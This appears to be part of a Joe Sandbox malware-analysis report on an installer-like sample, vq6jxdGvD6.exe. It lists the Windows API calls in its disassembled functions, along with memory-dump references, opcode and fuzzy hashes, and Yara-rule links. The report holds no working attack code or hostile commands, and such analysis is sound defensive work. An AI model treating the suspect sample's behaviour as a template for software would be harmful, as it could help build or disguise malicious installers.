Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction ID: bcda01e7c8f131fa4aeedd5c016714751ae51b75e9bd1bf7c5bedf72497e11f2
Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction Fuzzy Hash: 23D01276A18125AFC3102728ED0C89BBF65DB54371705CB31FCB9A26F0E7304C529AA5

Function 00405599 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031AE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 0040559F
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055AD

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: 609e72d12c2576d63fea847a2789036c648b4b30b0b2df40a2479a0d359059ce
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: 80C04C70609502EAEA515B319E08B177A66AB50741F1189356106F41F4D6349551D93F

Function 00405B40 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403170,00000000,00000000,00402FCD,000000FF,00000004,00000000,00000000,00000000), ref: 00405B54

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 4179e0c76098f610a2fd9102cb0c328980851925f4446f1dd22fc868df860445
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: 8CE0EC32A1425EABDF109E659C00EEB7BBCEB05760F048432FD15E3150D235F921DBA9

Function 00405B6F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040313E,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405B83

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: af6d97e9b78343fe008ce3e7999d984a763d513ea29e4df05d500f045cbeb3ca
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: B2E0EC3262425AABDF509E559C00AEB7BACEB05360F008436FD15E2151D635F8219FA5

Function 00405DB5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E43,?,?,?,?,00000002,: Completed), ref: 00405DD9

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: 1bb1e450acb1cec7aaebab1a7e88d6b79e3e17733f6ed9cfc6e3f6d6de5b0954
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: D9D0123214024EBBDF115F909C05FAB3B2DEF04314F108827FE06A4090D375D530AB65

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction ID: e41715f0e6a8bf2c44c365c92f64d23a332030a9f95fc047605520203e95b8fc
Opcode Fuzzy Hash: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
Instruction Fuzzy Hash: 9BD012B6708111ABCB10DFA8AA4869D77A49B40325B308137D515F21D0E2B9C9456719

Function 0040403C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 0040404E

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: a420b78244073386fdaf02eaad45271dfd1dc05eac8f2b2552ccdd106ab2ed6e
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: 70C09B717443007BFA31DB509D49F077758A750B00F5584357320F50D0C6B4E451D62D

Function 00403173 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 00403181

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 00405611 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00404415,?), ref: 00405620

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A

Function 00404025 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 00404012 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403DEE), ref: 0040401C

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Function 00401EDB Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Part of subcall function 004055CE: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
Part of subcall function 004055CE: CloseHandle.KERNEL32(?), ref: 00405604

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F20

Part of subcall function 0040633C: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040634D
Part of subcall function 0040633C: GetExitCodeProcess.KERNEL32(?,?), ref: 0040636F

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction ID: 17f7953f0d5b7b21d2e535c202f5bbb1bf051249d0315c8d96c64ca666d5043c
Opcode Fuzzy Hash: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
Instruction Fuzzy Hash: FCF0BB71A05121ABCB20BF654D495EF66A4DF81314B10057BFA01B21D1C77C4E4146BE

Non-executed Functions

Function 004049D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049EB
GetDlgItem.USER32(?,00000408), ref: 004049F6
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A40
LoadBitmapA.USER32(0000006E), ref: 00404A53
SetWindowLongA.USER32(?,000000FC,00404FCA), ref: 00404A6C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A80
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A92
SendMessageA.USER32(?,00001109,00000002), ref: 00404AA8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AB4
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AC6
DeleteObject.GDI32(00000000), ref: 00404AC9
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404AF4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B00
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B95
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BC0
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD4
GetWindowLongA.USER32(?,000000F0), ref: 00404C03
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C11
ShowWindow.USER32(?,00000005), ref: 00404C22
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D1F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D84
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D99
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DBD
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DDD
ImageList_Destroy.COMCTL32(00000000), ref: 00404DF2
GlobalFree.KERNEL32(00000000), ref: 00404E02
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E7B
SendMessageA.USER32(?,00001102,?,?), ref: 00404F24
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F33
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F53
ShowWindow.USER32(?,00000000), ref: 00404FA1
GetDlgItem.USER32(?,000003FE), ref: 00404FAC
ShowWindow.USER32(00000000), ref: 00404FB3

Strings

N, xrefs: 00404C5D
, xrefs: 00404F8B
M, xrefs: 00404B7C

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction ID: 4638a2be7f0938753f9a717370e01017d92af631219061991dd3498ab54a35db
Opcode Fuzzy Hash: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
Instruction Fuzzy Hash: 60027EB0900209AFEF109F54DC85AAE7BB5FB84315F10817AF615BA2E1C7789E42DF58

Function 00404460 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044AF
SetWindowTextA.USER32(00000000,?), ref: 004044D9
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 0040458A
CoTaskMemFree.OLE32(00000000), ref: 00404595
lstrcmpiA.KERNEL32(: Completed,Tyfusepidemierne Setup: Completed), ref: 004045C7
lstrcatA.KERNEL32(?,: Completed), ref: 004045D3
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045E5

Part of subcall function 0040562F: GetDlgItemTextA.USER32(?,?,00000400,0040461C), ref: 00405642

Part of subcall function 00406199: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\vq6jxdGvD6.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
Part of subcall function 00406199: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
Part of subcall function 00406199: CharNextA.USER32(?,"C:\Users\user\Desktop\vq6jxdGvD6.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
Part of subcall function 00406199: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046A3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046BE

Part of subcall function 00404817: lstrlenA.KERNEL32(Tyfusepidemierne Setup: Completed,Tyfusepidemierne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
Part of subcall function 00404817: wsprintfA.USER32 ref: 004048BD
Part of subcall function 00404817: SetDlgItemTextA.USER32(?,Tyfusepidemierne Setup: Completed), ref: 004048D0

Strings

: Completed, xrefs: 004045C1, 004045C6, 004045D1
C:\Users\user\AppData\Local\unshabbily, xrefs: 004045B0
A, xrefs: 00404583
Tyfusepidemierne Setup: Completed, xrefs: 0040455D, 004045C0

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

